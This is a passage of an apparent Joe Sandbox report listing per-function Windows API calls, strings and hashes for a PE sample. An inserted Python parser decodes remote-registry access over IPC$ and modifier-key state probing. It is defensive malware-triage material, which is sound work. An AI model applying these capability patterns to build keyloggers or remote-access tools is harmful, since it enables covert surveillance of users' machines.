                                                                              • __wcsicoll.LIBCMT ref: 00445AE0
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 3125838495-3381328864
                                                                              • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                              • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 2286883814-4206948668
                                                                              • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                              • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                              • _wcscpy.LIBCMT ref: 00475F18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                              • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                              • API String ID: 3052893215-4176887700
                                                                              • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                              • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                              APIs
                                                                              • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                              • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                              • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                              • String ID: Version$\TypeLib$interface\
                                                                              • API String ID: 656856066-939221531
                                                                              • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                              • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                              • __swprintf.LIBCMT ref: 0045E6EE
                                                                              • _printf.LIBCMT ref: 0045E7A9
                                                                              • _printf.LIBCMT ref: 0045E7D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 3590180749-2354261254
                                                                              • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                              • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 3038501623-2263619337
                                                                              • Opcode ID: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                              • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                              • Opcode Fuzzy Hash: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                              • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00458194
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 2255324689-22481851
                                                                              • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                              • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                              • __wcsicoll.LIBCMT ref: 004585D6
                                                                              • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                              • String ID: ($interface$interface\
                                                                              • API String ID: 2231185022-3327702407
                                                                              • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                              • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2691793716-3771769585
                                                                              • Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                              • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                              • Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                              • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                              • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                              • __lock.LIBCMT ref: 00416B8A
                                                                              • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                              • __lock.LIBCMT ref: 00416BAB
                                                                              • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                              • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                              • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                              • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                              • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                              • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CharNext
                                                                              • String ID:
                                                                              • API String ID: 1350042424-0
                                                                              • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                              • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                              • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                              • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                              • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                              • GetKeyState.USER32(00000011), ref: 00453D15
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                              • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                              • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                              • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
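Two of the function listings above are worth decoding by hand: the one at ref 004581D6 onward (WNetAddConnection2W, RegConnectRegistryW against hive 80000002, RegOpenKeyExW with access mask 00020019, RegQueryValueExW, CLSIDFromString, alongside the strings SOFTWARE\Classes\, \CLSID and \IPC$, which is consistent with resolving a ProgID to a CLSID in a remote machine's registry over an IPC$ session), and the one at ref 00453C0D onward (GetKeyboardState/SetKeyboardState followed by paired GetAsyncKeyState/GetKeyState probes of 000000A0, 000000A1, 00000011, 00000012 and 0000005B, which are the modifier virtual-key codes). The parser below is an added example, not part of this Joe Sandbox report or of its tooling: it reads API lines in the exact format the report uses (including the "Part of subcall function" form), splits the arguments, and annotates the registry hives, access masks and virtual-key codes from the Win32 constants. The sample input (SAMPLE) is constructed from lines copied from this report; the capability tags in `capabilities` are a triage heuristic of this example, not a verdict from the sandbox.

```python
"""Parse the per-function API listings of a Joe Sandbox report and decode
the numeric arguments an analyst would otherwise look up by hand.

Added example; SAMPLE is constructed from API lines shown in this report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: lines copied from the function listings above.
SAMPLE = """\
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
• RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
• CLSIDFromString.OLE32(00000000,?), ref: 00458279
• RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
• GetAsyncKeyState.USER32(000000A0), ref: 00453C82
• GetKeyState.USER32(0000005B), ref: 00453D85
"""

# One API line: optional "Part of subcall function X:" prefix, API.MODULE,
# optional parenthesised argument list, then "ref: ADDRESS".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (from winreg.h / winuser.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
      0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None
    notes: List[str] = field(default_factory=list)


def _hex(arg: str) -> Optional[int]:
    """Integer value of a hex argument; None for '?' or symbolic arguments."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_line(line: str) -> Optional[Call]:
    """Parse one report line; returns None for headers and non-API lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return Call(m["api"], m["module"], args, int(m["ref"], 16), sub)


def annotate(call: Call) -> Call:
    """Decode arguments whose meaning is fixed by the API's prototype."""
    a = call.args
    # hKey is argument 0 for RegOpenKeyExW and argument 1 for RegConnectRegistryW.
    if call.api in ("RegOpenKeyExW", "RegConnectRegistryW", "RegCreateKeyExW"):
        idx = 1 if call.api == "RegConnectRegistryW" else 0
        v = _hex(a[idx]) if len(a) > idx else None
        if v in HIVES:
            call.notes.append(f"hive={HIVES[v]}")
    if call.api == "RegOpenKeyExW" and len(a) > 3:     # samDesired
        v = _hex(a[3])
        if v in SAM:
            call.notes.append(f"samDesired={SAM[v]}")
    if call.api in ("GetAsyncKeyState", "GetKeyState") and a:   # vKey
        v = _hex(a[0])
        if v in VK:
            call.notes.append(f"vk={VK[v]}")
    return call


def parse_report(text: str) -> List[Call]:
    return [annotate(c) for c in map(parse_line, text.splitlines()) if c]


def capabilities(calls: List[Call]) -> set:
    """Coarse triage tags from which APIs co-occur in one function (heuristic)."""
    names = {c.api for c in calls}
    tags = set()
    if "RegConnectRegistryW" in names and "WNetAddConnection2W" in names:
        tags.add("remote-registry-over-smb")
    if {"GetKeyboardState", "SetKeyboardState"} & names:
        tags.add("reads-or-rewrites-keyboard-state")
    if "CLSIDFromString" in names:
        tags.add("resolves-com-class-ids")
    return tags


if __name__ == "__main__":
    calls = parse_report(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(c.args)}) {' '.join(c.notes)}")
    print(sorted(capabilities(calls)))
```

Running it over the ten sample lines prints HKEY_LOCAL_MACHINE for the RegConnectRegistryW call, KEY_READ for both RegOpenKeyExW calls, HKEY_CLASSES_ROOT for the second of them, and VK_LSHIFT / VK_LWIN for the key probes; symbolic arguments such as `?` and `interface` are left undecoded rather than guessed. The capability tags are deliberately keyed on API co-occurrence within one function, which is what the report's per-function grouping gives you; they are a starting point for triage, not a classification.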
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                              • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437E82
